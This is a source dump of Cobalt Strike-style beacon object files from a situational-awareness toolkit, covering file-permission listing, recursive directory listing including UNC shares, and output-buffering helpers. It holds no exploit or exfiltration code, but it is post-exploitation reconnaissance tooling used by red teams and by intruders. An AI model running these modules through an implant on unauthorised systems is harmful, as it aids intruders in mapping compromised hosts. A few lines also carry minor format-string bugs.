    LOVEIT(AccessRights[12], GENERIC_ALL, IDS_GENERIC_ALL);
    LOVEIT(AccessRights[13], GENERIC_EXECUTE, IDS_GENERIC_EXECUTE);
    LOVEIT(AccessRights[14], GENERIC_WRITE, IDS_GENERIC_WRITE);
    LOVEIT(AccessRights[15], GENERIC_READ, IDS_GENERIC_READ);
    LOVEIT(AccessRights[16], MAXIMUM_ALLOWED, IDS_MAXIMUM_ALLOWED);
    LOVEIT(AccessRights[17], ACCESS_SYSTEM_SECURITY, IDS_ACCESS_SYSTEM_SECURITY);
    LOVEIT(AccessRights[18], SPECIFIC_RIGHTS_ALL, IDS_SPECIFIC_RIGHTS_ALL);
    LOVEIT(AccessRights[19], STANDARD_RIGHTS_REQUIRED, IDS_STANDARD_RIGHTS_REQUIRED);
    LOVEIT(AccessRights[20], SYNCHRONIZE, IDS_SYNCHRONIZE);
    LOVEIT(AccessRights[21], WRITE_OWNER, IDS_WRITE_OWNER);
    LOVEIT(AccessRights[22], WRITE_DAC, IDS_WRITE_DAC);
    LOVEIT(AccessRights[23], READ_CONTROL, IDS_READ_CONTROL);
    LOVEIT(AccessRights[24], DELETE, IDS_DELETE);
    LOVEIT(AccessRights[25], STANDARD_RIGHTS_ALL, IDS_STANDARD_RIGHTS_ALL);
}

void DoneLovingIt()
{
    intFree(AccessRights);
}



static BOOL
PrintFileDacl(IN LPWSTR FilePath,
              IN LPWSTR FileName,
              IN enum searchtype ST)
{
	GENERIC_MAPPING FileGenericMapping = {0};
    SIZE_T Length;
    PSECURITY_DESCRIPTOR SecurityDescriptor;
    DWORD SDSize = 0;
    WCHAR FullFileName[MAX_PATH + 1];
    BOOL Error = FALSE, Ret = FALSE;
    int x = 0, x2 = 0;
    if(ST == File)
    {
        Length = KERNEL32$lstrlenW(FilePath) + KERNEL32$lstrlenW(FileName);
        if (Length > MAX_PATH)
        {
            /* file name too long */
            KERNEL32$SetLastError(ERROR_FILE_NOT_FOUND);
            return FALSE;
        }

        KERNEL32$lstrcpynW(FullFileName, FilePath, MAX_PATH);
        KERNEL32$lstrcatW(FullFileName, FileName);
    }else
    {
        KERNEL32$lstrcpynW(FullFileName, FilePath, MAX_PATH);
    }


    /* find out how much memory we need */
    if (!ADVAPI32$GetFileSecurityW(FullFileName,
                         DACL_SECURITY_INFORMATION,
                         NULL,
                         0,
                         &SDSize) &&
        KERNEL32$GetLastError() != ERROR_INSUFFICIENT_BUFFER)
    {
        return FALSE;
    }

    SecurityDescriptor = (PSECURITY_DESCRIPTOR)intAlloc(SDSize);
    if (SecurityDescriptor != NULL)
    {
        if (ADVAPI32$GetFileSecurityW(FullFileName,
                            DACL_SECURITY_INFORMATION,
                            SecurityDescriptor,
                            SDSize,
                            &SDSize))
        {
            PACL Dacl;
            BOOL DaclPresent;
            BOOL DaclDefaulted;
            if (ADVAPI32$GetSecurityDescriptorDacl(SecurityDescriptor,
                                          &DaclPresent,
                                          &Dacl,
                                          &DaclDefaulted))
            {
                if (Dacl && DaclPresent)
                {
                    PACCESS_ALLOWED_ACE Ace;
                    DWORD AceIndex = 0;

                    /* dump the ACL */
                    while (ADVAPI32$GetAce(Dacl,
                                  AceIndex,
                                  (PVOID*)&Ace))
                    {
                        SID_NAME_USE Use;
                        DWORD NameSize = 0;
                        DWORD DomainSize = 0;
                        LPWSTR Name = NULL;
                        LPWSTR Domain = NULL;
                        LPWSTR SidString = NULL;
                        DWORD IndentAccess = 0;

                        DWORD AccessMask = Ace->Mask;
                        PSID Sid = (PSID)&Ace->SidStart;
//                         /* attempt to translate the SID into a readable string */
                        if (!ADVAPI32$LookupAccountSidW(NULL,
                                              Sid,
                                              Name,
                                              &NameSize,
                                              Domain,
                                              &DomainSize,
                                              &Use))
                        {
                            if (KERNEL32$GetLastError() == ERROR_NONE_MAPPED || NameSize == 0)
                            {
                                goto BuildSidString;
                            }
                            else
                            {
                                if (KERNEL32$GetLastError() != ERROR_INSUFFICIENT_BUFFER)
                                {
                                    Error = TRUE;
                                    break;
                                }

                                Name = (LPWSTR)intAlloc((NameSize + DomainSize) * 2);
                                if (Name == NULL)
                                {
                                    KERNEL32$SetLastError(ERROR_NOT_ENOUGH_MEMORY);
                                    Error = TRUE;
                                    break;
                                }

                                Domain = Name + NameSize;
                                Name[0] = L'\0';
                                if (DomainSize != 0)
                                    Domain[0] = L'\0';
                                if (!ADVAPI32$LookupAccountSidW(NULL,
                                                      Sid,
                                                      Name,
                                                      &NameSize,
                                                      Domain,
                                                      &DomainSize,
                                                      &Use))
                                {
                                    intFree(Name);
                                    Name = NULL;
                                    goto BuildSidString;
                                }
                            }

                        }
                        else
                        {
BuildSidString:
                            if (!ADVAPI32$ConvertSidToStringSidW(Sid,
                                                       &SidString))
                            {
                                Error = TRUE;
                                break;
                            }
                        }

                        /* print the file name or space */
                        SIZE_T FullFileNameLen = KERNEL32$lstrlenW(FullFileName);
                        char * convertedFullFileName = intAlloc(FullFileNameLen + 1);
                        ConvertUnicodeStringToChar(FullFileName, FullFileNameLen + 1, convertedFullFileName, FullFileNameLen + 1);
                        internal_printf("%s ", convertedFullFileName);
                        intFree(convertedFullFileName);
                        /* attempt to map the SID to a user name */
                        if (AceIndex == 0)
                        {
                            DWORD i = 0;

                            /* overwrite the full file name with spaces so we
                               only print the file name once */
                            while (FullFileName[i] != L'\0')
                                FullFileName[i++] = L' ';
                        }

                        /* print the domain and/or user if possible, or the SID string */
                        if (Name != NULL && Domain != NULL && Domain[0] != L'\0')
                        {
                            SIZE_T DomainLen = KERNEL32$lstrlenW(Domain);
                            SIZE_T NameLen = KERNEL32$lstrlenW(Name);
                            char * convertedDomain = intAlloc(DomainLen + 1);
                            char * convertedName = intAlloc(NameLen + 1);
                            ConvertUnicodeStringToChar(Domain, DomainLen + 1, convertedDomain, DomainLen + 1);
                            ConvertUnicodeStringToChar(Name, NameLen + 1, convertedName, NameLen + 1);
                            internal_printf("%s\\%s:", convertedDomain, convertedName);
                            IndentAccess = (DWORD)KERNEL32$lstrlenW(Domain) + KERNEL32$lstrlenW(Name);
                            intFree(convertedDomain);
                            intFree(convertedName);
                        }
                        else
                        {
                            LPWSTR DisplayString = (Name != NULL ? Name : SidString);
                            if(DisplayString)
                            {
                                SIZE_T DisplayStringLen = KERNEL32$lstrlenW(DisplayString);
                                char * convertedString = intAlloc(DisplayStringLen + 1);
                                ConvertUnicodeStringToChar(DisplayString, DisplayStringLen + 1, convertedString, DisplayStringLen + 1);
                                internal_printf( "%s:", convertedString);
                                IndentAccess = (DWORD)KERNEL32$lstrlenW(DisplayString);
                                intFree(convertedString);
                            }
                        }

                        /* print the ACE Flags */
                        if (Ace->Header.AceFlags & CONTAINER_INHERIT_ACE)
                        {
							internal_printf("%s", IDS_ABBR_CI);
							IndentAccess += 4;
                            //IndentAccess += ConResPuts(StdOut, IDS_ABBR_CI);
                        }
                        if (Ace->Header.AceFlags & OBJECT_INHERIT_ACE)
                        {
							internal_printf("%s", IDS_ABBR_OI);
							IndentAccess += 4;
                            //IndentAccess += ConResPuts(StdOut, IDS_ABBR_OI);
                        }
                        if (Ace->Header.AceFlags & INHERIT_ONLY_ACE)
                        {
							internal_printf("%s", IDS_ABBR_IO);
							IndentAccess += 4;

                            //IndentAccess += ConResPuts(StdOut, IDS_ABBR_IO);
                        }

                        IndentAccess += 2;
                        /* print the access rights */
                        ADVAPI32$MapGenericMask(&AccessMask,
                                       &FileGenericMapping);
                        if (Ace->Header.AceType & ACCESS_DENIED_ACE_TYPE)
                        {
                            if (AccessMask == FILE_ALL_ACCESS)
                            {
                                internal_printf("%s", IDS_ABBR_NONE);
                            }
                            else
                            {
                                internal_printf("%s", IDS_DENY);
                                goto PrintSpecialAccess;
                            }
                        }
                        else
                        {
                            if (AccessMask == FILE_ALL_ACCESS)
                            {
                                internal_printf("%s", IDS_ABBR_FULL);
                            }
                            else if (!(Ace->Mask & (GENERIC_READ | GENERIC_EXECUTE)) &&
                                     AccessMask == (FILE_GENERIC_READ | FILE_EXECUTE))
                            {
                                internal_printf("%s", IDS_ABBR_READ);
                            }
                            else if (AccessMask == (FILE_GENERIC_READ | FILE_GENERIC_WRITE | FILE_EXECUTE | DELETE))
                            {
                                internal_printf("%s", IDS_ABBR_CHANGE);
                            }
                            else if (AccessMask == FILE_GENERIC_WRITE)
                            {
                                internal_printf("%s", IDS_ABBR_WRITE);
                            }
                            else
                            {
                                internal_printf("%s", IDS_ALLOW);
PrintSpecialAccess:
                                internal_printf("%s", IDS_SPECIAL_ACCESS);
                                /* print the special access rights */
                                x = 25;
                                while (x >= 0)
                                {
                                    if ((Ace->Mask & AccessRights[x].Access) == AccessRights[x].Access)
                                    {
                                        SIZE_T FullFileNameLen = KERNEL32$lstrlenW(FullFileName);
                                        char * convertedFullFileName = intAlloc(FullFileNameLen + 1);
                                        ConvertUnicodeStringToChar(FullFileName, FullFileNameLen + 1, convertedFullFileName, FullFileNameLen + 1);
                                        internal_printf("\n%s ", FullFileName);
                                        intFree(convertedFullFileName);
                                        for (x2 = 0; x2 < IndentAccess; x2++)
                                        {
                                            internal_printf("%s", " ");
                                        }

                                        internal_printf("%s", AccessRights[x].uID);
                                    }
                                    x--;
                                }

                                internal_printf("%s", "\n");
//                             }
                            }
                        }

                        internal_printf("%s", "\n");

                        /* free up all resources */
                        if (Name != NULL)
                        {
                            intFree(Name);
                            Name = NULL;
                        }

                        if (SidString != NULL)
                        {
                            KERNEL32$LocalFree((HLOCAL)SidString);
                            SidString = NULL;
                        }

                        AceIndex++;
                    }
                    if (!Error)
                        Ret = TRUE;
                }
                else
                {
                    KERNEL32$SetLastError(ERROR_NO_SECURITY_ON_OBJECT);
                }
            }
        }
        if(SecurityDescriptor)
        {
		    intFree(SecurityDescriptor);
            SecurityDescriptor = NULL;
        }
    }
    else
    {
        KERNEL32$SetLastError(ERROR_NOT_ENOUGH_MEMORY);
    }

    return Ret;
}

static VOID
AddBackslash(LPWSTR FilePath)
{
    INT len = KERNEL32$lstrlenW(FilePath);
    LPWSTR pch = USER32$CharPrevW(FilePath, FilePath + len);
    if (*pch != L'\\')
        KERNEL32$lstrcatW(pch, L"\\");
}

static enum searchtype
GetPathOfFile(LPWSTR FilePath, LPCWSTR pszFiles)
{
    WCHAR FullPath[MAX_PATH];
    LPWSTR pch;
    DWORD attrs;
    //First lets check if we are pointing at a folder

    attrs = KERNEL32$GetFileAttributesW(pszFiles);
    if(attrs != INVALID_FILE_ATTRIBUTES && (attrs & FILE_ATTRIBUTE_DIRECTORY))
    {
        KERNEL32$GetFullPathNameW(pszFiles, MAX_PATH, FilePath, NULL);
        return Folder;
    }
    // if we get here its probably not a folder, lets follow file logic
    KERNEL32$lstrcpynW(FilePath, pszFiles, MAX_PATH);


    pch = MSVCRT$wcsrchr(FilePath, L'\\');
    if (pch != NULL)
    {
        *pch = 0;
        if (!KERNEL32$GetFullPathNameW(FilePath, MAX_PATH, FullPath, NULL))
        {
            BeaconPrintf(CALLBACK_ERROR, "Failed to resolve path: 0x%lx", KERNEL32$GetLastError());
            return Fail;
        }
        KERNEL32$lstrcpynW(FilePath, FullPath, MAX_PATH);

        attrs = KERNEL32$GetFileAttributesW(FilePath);
        if (attrs == 0xFFFFFFFF || !(attrs & FILE_ATTRIBUTE_DIRECTORY))
        {
            BeaconPrintf(CALLBACK_ERROR, "Failed to resolve attributes: %ld", ERROR_DIRECTORY);
            return Fail;
        }
    }
    else
        KERNEL32$GetCurrentDirectoryW(MAX_PATH, FilePath);

    AddBackslash(FilePath);
    return File;
}

static BOOL
PrintDaclsOfFiles(LPCWSTR pszFiles)
{
    WCHAR FilePath[MAX_PATH] = {0};
    WIN32_FIND_DATAW FindData;
    HANDLE hFind;
    DWORD LastError;
    enum searchtype ST;
    /*
     * get the file path
     */
    ST = GetPathOfFile(FilePath, pszFiles);
    switch (ST)
    {
        case Fail:
            BeaconPrintf(CALLBACK_ERROR, "Unable to resolve file path");
            return FALSE;
        case Folder:
        {
            if(!PrintFileDacl(FilePath, L"", ST))
            {
                BeaconPrintf(CALLBACK_ERROR, "Unable to list permissions of file %S", pszFiles);
                return FALSE;
            }
            return TRUE;
        }
        case File:
            break;
        default:
            break;
    }

    //again lets see if this is a folder

    /*
     * search for the files
     */
    hFind = KERNEL32$FindFirstFileW(pszFiles, &FindData);
    if (hFind == INVALID_HANDLE_VALUE)
    {
        BeaconPrintf(CALLBACK_ERROR, "Error starting search handle\n");
        return FALSE;
    }

    do
    {
        if (FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            continue;

        if (!PrintFileDacl(FilePath, FindData.cFileName, ST))
        {
            LastError = KERNEL32$GetLastError();
            if (LastError == ERROR_ACCESS_DENIED)
            {
                BeaconPrintf(CALLBACK_ERROR, "Unable to list permissions of file %S", FindData.cFileName);
            }
            else
            {
				BeaconPrintf(CALLBACK_ERROR, "Unhandled error in listing: 0x%lx", LastError);
                break;
            }
        }
        else
        {
            internal_printf("\n");
        }
    } while(KERNEL32$FindNextFileW(hFind, &FindData));
    LastError = KERNEL32$GetLastError();
    KERNEL32$FindClose(hFind);

    if (LastError != ERROR_NO_MORE_FILES)
    {
        BeaconPrintf(CALLBACK_ERROR, "Unable to handle all files, received error 0x%lx", LastError);
        return FALSE;
    }

    return TRUE;
}


VOID go(
	IN PCHAR Buffer,
	IN ULONG Length
)
{
	datap parser;
	const wchar_t * targetpath = NULL;
	BeaconDataParse(&parser, Buffer, Length);
	targetpath = (const wchar_t*) BeaconDataExtract(&parser, NULL);
	if(!bofstart())
	{
		return;
	}
    LovingIt();
	PrintDaclsOfFiles(targetpath);
    DoneLovingIt();
	printoutput(TRUE);
};

================================================
FILE: SAL-BOF/cacls/defines.h
================================================
 #define IDS_ABBR_CI "(CI)"
 #define IDS_ABBR_OI "(OI)"
 #define IDS_ABBR_IO "(IO)"
 #define IDS_ABBR_FULL "F"
 #define IDS_ABBR_READ "R"
 #define IDS_ABBR_WRITE "W"
 #define IDS_ABBR_CHANGE "C"
 #define IDS_ABBR_NONE "N"
 #define IDS_ALLOW ""
 #define IDS_DENY "(DENY)"
 #define IDS_SPECIAL_ACCESS "(special access:)"
 #define IDS_GENERIC_READ "GENERIC_READ"
 #define IDS_GENERIC_WRITE "GENERIC_WRITE"
 #define IDS_GENERIC_EXECUTE "GENERIC_EXECUTE"
 #define IDS_GENERIC_ALL "GENERIC_ALL"
 #define IDS_FILE_GENERIC_EXECUTE "FILE_GENERIC_EXECUTE"
 #define IDS_FILE_GENERIC_READ "FILE_GENERIC_READ"
 #define IDS_FILE_GENERIC_WRITE "FILE_GENERIC_WRITE"
 #define IDS_FILE_READ_DATA "FILE_READ_DATA"
 #define IDS_FILE_WRITE_DATA "FILE_WRITE_DATA"
 #define IDS_FILE_APPEND_DATA "FILE_APPEND_DATA"
 #define IDS_FILE_READ_EA "FILE_READ_EA"
 #define IDS_FILE_WRITE_EA "FILE_WRITE_EA"
 #define IDS_FILE_EXECUTE "FILE_EXECUTE"
 #define IDS_FILE_DELETE_CHILD "FILE_DELETE_CHILD"
 #define IDS_FILE_READ_ATTRIBUTES "FILE_READ_ATTRIBUTES"
 #define IDS_FILE_WRITE_ATTRIBUTES "FILE_WRITE_ATTRIBUTES"
 #define IDS_MAXIMUM_ALLOWED "MAXIMUM_ALLOWED"
 #define IDS_ACCESS_SYSTEM_SECURITY "ACCESS_SYSTEM_SECURITY"
 #define IDS_SPECIFIC_RIGHTS_ALL "SPECIFIC_RIGHTS_ALL"
 #define IDS_STANDARD_RIGHTS_REQUIRED "STANDARD_RIGHTS_REQUIRED"
 #define IDS_SYNCHRONIZE "SYNCHRONIZE"
 #define IDS_WRITE_OWNER "WRITE_OWNER"
 #define IDS_WRITE_DAC "WRITE_DAC"
 #define IDS_READ_CONTROL "READ_CONTROL"
 #define IDS_DELETE "DELETE"
 #define IDS_STANDARD_RIGHTS_ALL "STANDARD_RIGHTS_ALL"

================================================
FILE: SAL-BOF/dir/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: SAL-BOF/dir/dir.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "base.c"
#include "queue.c"

void listDir(char *path, unsigned short subdirs) {

	WIN32_FIND_DATA fd = {0};
	HANDLE hand = NULL;
	LARGE_INTEGER fileSize;
	LONGLONG totalFileSize = 0;
	int nFiles = 0;
	int nDirs = 0;
	Pqueue dirQueue = queueInit();
	char * uncIndex;
	char * curitem;
	char * nextPath;
	int pathlen = MSVCRT$strlen(path);

	// Per MSDN: "On network shares ... you cannot use an lpFileName that points to the share itself; for example, "\\Server\Share" is not valid."
	// Workaround: If we're using a UNC Path, there'd better be at least 4 backslashes
	// This breaks the convention, but a `cmd /c dir \\hostname\admin$` will work, so let's replicate that functionality.
	if (MSVCRT$_strnicmp(path, "\\\\", 2) == 0) {
		uncIndex = MSVCRT$strstr(path + 2, "\\");
		if (uncIndex != NULL && MSVCRT$strstr(uncIndex + 1, "\\") == NULL) {
			MSVCRT$strcat(path, "\\");
			pathlen = pathlen + 1;
		}
	}

	// If the file ends in \ or is a drive (C:), throw a * on there
	if (MSVCRT$strcmp(path + pathlen - 1, "\\") == 0) {
		MSVCRT$strcat(path, "*");
	} else if (MSVCRT$strcmp(path + pathlen - 1, ":") == 0) {
		MSVCRT$strcat(path, "\\*");
	}

	// Query the first file
	(hand = KERNEL32$FindFirstFileA(path, &fd));
	if (hand == INVALID_HANDLE_VALUE) {
		internal_printf("Couldn't open %s: Error %u\n", path, KERNEL32$GetLastError());
		KERNEL32$FindClose(hand);
		return;
	}
	// If it's a single directory without a wildcard, re-run it with a \*
	if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY && MSVCRT$strstr(path, "*") == NULL) {
		MSVCRT$strcat(path, "\\*");
		listDir(path, subdirs);
		KERNEL32$FindClose(hand);
		return;
	}

	internal_printf("Contents of %s:\n", path);
	do {
		// Get file write time
		SYSTEMTIME stUTC, stLocal;
		KERNEL32$FileTimeToSystemTime(&(fd.ftLastWriteTime), &stUTC);
		KERNEL32$SystemTimeToTzSpecificLocalTime(NULL, &stUTC, &stLocal);

		internal_printf("\t%02d/%02d/%02d %02d:%02d",
				stLocal.wMonth, stLocal.wDay, stLocal.wYear, stLocal.wHour, stLocal.wMinute);

		// File size (or ujust print dir)
		if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
			if (fd.dwFileAttributes & FILE_ATTRIBUTE_REPARSE_POINT) {
				internal_printf("%16s %s\n", "<junction>", fd.cFileName);
			} else {
				internal_printf("%16s %s\n", "<dir>", fd.cFileName);
			}
			nDirs++;
			// ignore . and ..
			if (MSVCRT$strcmp(fd.cFileName, ".") == 0 || MSVCRT$strcmp(fd.cFileName, "..") == 0) {
				continue;
			}
			// Queue subdirectory for recursion
			if (subdirs) {
				nextPath = intAlloc((MSVCRT$strlen(path) + MSVCRT$strlen(fd.cFileName) + 3)*2);
				MSVCRT$strncat(nextPath, path, MSVCRT$strlen(path)-1);
				MSVCRT$strcat(nextPath, fd.cFileName);
				dirQueue->push(dirQueue, nextPath);
			}
		} else {
			fileSize.LowPart = fd.nFileSizeLow;
			fileSize.HighPart = fd.nFileSizeHigh;
			internal_printf("%16lld %s\n", fileSize.QuadPart, fd.cFileName);

			nFiles++;
			totalFileSize += fileSize.QuadPart;
		}
	} while(KERNEL32$FindNextFileA(hand, &fd));
	internal_printf("\t%32lld Total File Size for %d File(s)\n", totalFileSize, nFiles);
	internal_printf("\t%55d Dir(s)\n", nDirs);

	// A single error (ERROR_NO_MORE_FILES) is normal
	DWORD err = KERNEL32$GetLastError();
	if (err != ERROR_NO_MORE_FILES) {
		BeaconPrintf(CALLBACK_ERROR, "Error fetching files: %s\n", err);
		KERNEL32$FindClose(hand);
		return;
	}

	KERNEL32$FindClose(hand);
	while((curitem = dirQueue->pop(dirQueue)) != NULL) {
		listDir(curitem, subdirs);
		intFree(curitem);
	}
	dirQueue->free(dirQueue);

}

void ConvertUnicodeStringToChar(const wchar_t* src, size_t srcSize, char* dst, size_t dstSize)
{
    KERNEL32$WideCharToMultiByte(CP_ACP, 0, src, (int)srcSize, dst, (int)dstSize, NULL, NULL);
    dst[dstSize - 1] = '\0';
}

VOID go(
	IN PCHAR Buffer,
	IN ULONG Length
)
{
	datap parser;
	const wchar_t * targetpath = NULL;
	BeaconDataParse(&parser, Buffer, Length);
	targetpath = (const wchar_t*) BeaconDataExtract(&parser, NULL);
	SIZE_T targetpathLen = KERNEL32$lstrlenW(targetpath);
    char * path = intAlloc(targetpathLen + 1);
    ConvertUnicodeStringToChar(targetpath, targetpathLen + 1, path, targetpathLen + 1);
    BeaconPrintf(CALLBACK_OUTPUT, path);
    unsigned short subdirs = BeaconDataShort(&parser);

	// Not positive how long path is, let's be safe
	// At worst, we will append \* so give it four bytes (= 2 wchar_t)
	char * realPath = intAlloc(1024);
	MSVCRT$strncat(realPath, path, 1023);

	if(!bofstart())
	{
		return;
	}

	listDir(realPath, subdirs);
    intFree(path);
	intFree(realPath);
	printoutput(TRUE);
};

================================================
FILE: SAL-BOF/dir/queue.c
================================================
#include "bofdefs.h"
//Not if anyone else adopts or looks at this
//Its not threadsafe
typedef struct _item{
    void * elem;
    struct _item * next;
}item, *Pitem;

typedef struct _queue{\
    Pitem head;
    Pitem tail;
    void (*push)(struct _queue *, void *);
    void * (*pop)(struct _queue *);
    void (*free)(struct _queue *);
}queue, *Pqueue;

void _push(Pqueue q, void * v)
{
    Pitem i = (Pitem)intAlloc(sizeof(item));
    i->elem = v;
    if(q->head == NULL && q->tail == NULL) // empty
    {
        q->head = i;
        q->tail = i;
        i->next = NULL;
    }else // not empty
    {
        q->tail->next = i;
        q->tail = i;
    }
}
void * _pop(Pqueue q)
{
    void * retval = NULL;
    Pitem i = NULL;
    if(q->head == NULL && q->tail == NULL) // empty
    {
        return NULL;
    }
    retval = q->head->elem; //scanbuild false positive
    if(q->head == q->tail) //last elem
    {
        intFree(q->head);
        q->head = NULL;
        q->tail = NULL;
    }
    else // not the last item
    {
        i = q->head;
        q->head = q->head->next;
        intFree(i);
    }
    return retval;
    
}

void _free(Pqueue q)
{
    intFree(q);
}

Pqueue queueInit()
{
    Pqueue q = (Pqueue)intAlloc(sizeof(queue));
    q->head = NULL;
    q->tail = NULL;
    q->push = _push;
    q->pop = _pop;
    q->free = _free;
    return q;
}

================================================
FILE: SAL-BOF/env/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
